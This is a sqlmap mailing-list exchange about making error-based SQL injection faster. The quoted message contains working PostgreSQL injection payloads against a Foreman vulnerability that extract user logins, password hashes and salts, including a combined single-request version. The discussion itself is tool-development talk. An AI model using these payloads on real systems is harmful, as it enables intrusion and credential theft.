In lots of cases you'll have some sort of length constraints in either GET
or POST body. Putting all those SELECTs into single requests simply won't
work (especially in GET cases).
One more thing. In case of (e.g.) MsSQL there is no "LIMIT m,n" mechanism.
Hence, sqlmap uses something called "pivoting" to dump table content, which
requires different queries for different column values.
Bye
On Thu, Mar 29, 2018 at 1:59 AM, Brandon Perry <bperry.volat...@gmail.com>
wrote:
> I’m currently exploiting a recent vulnerability announced in Foreman
> versions 1.9+ through 1.16.1. The available techniques are boolean, time,
> and error-based.
>
> Error based is the fastest obviously, but it seems like it could be
> faster. Currently, it performs an error-based exfil in a similar way MySQL
> error-based injections are done, which is a single value at a time. IIRC,
> MySQL errors get truncated so that you generally can’t exfil more than 50
> or so characters at a time, so this strategy makes sense in those cases.
>
> However, PostgreSQL errors that are bubbled up don’t (seem to) have this
> limitation and will return very lengthy error messages.
>
> Currently, sqlmap will grab a value per column per row per request. That
> looks like this.
>
> widgets[16) AND 8137=CAST((CHR(113)||CHR(107)|
> |CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_salt AS
> CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT
> 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)--
> lsuo][col]=1
>
> widgets[16) AND 8137=CAST((CHR(113)||CHR(107)|
> |CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_hash AS
> CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT
> 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)--
> lsuo][col]=1
>
> widgets[16) AND 8137=CAST((CHR(113)||CHR(107)|
> |CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(login AS
> CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT
> 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)--
> lsuo][col]=1
>
>
> Each of these values take a single request/response. But they could easily
> be combined into one with each distinct value being pulled out with a
> regular expression.
>
> widgets[16) AND 8137=CAST((CHR(113)||CHR(107)|
> |CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_salt AS
> CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT
> 1)::text||(CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT
> COALESCE(CAST(password_hash AS CHARACTER(10000)),(CHR(32))) FROM users
> ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(107)|
> |CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(login AS
> CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT
> 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)--
> lsuo][col]=1
>
>
> But there may be a reason sqlmap does this in the former way. Anyway, just
> my 2c.
>
> ------------------------------------------------------------
> ------------------
> Check out the vibrant tech community on one of the world's most
> engaging tech sites, Slashdot.org! http://sdm.link/slashdot
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
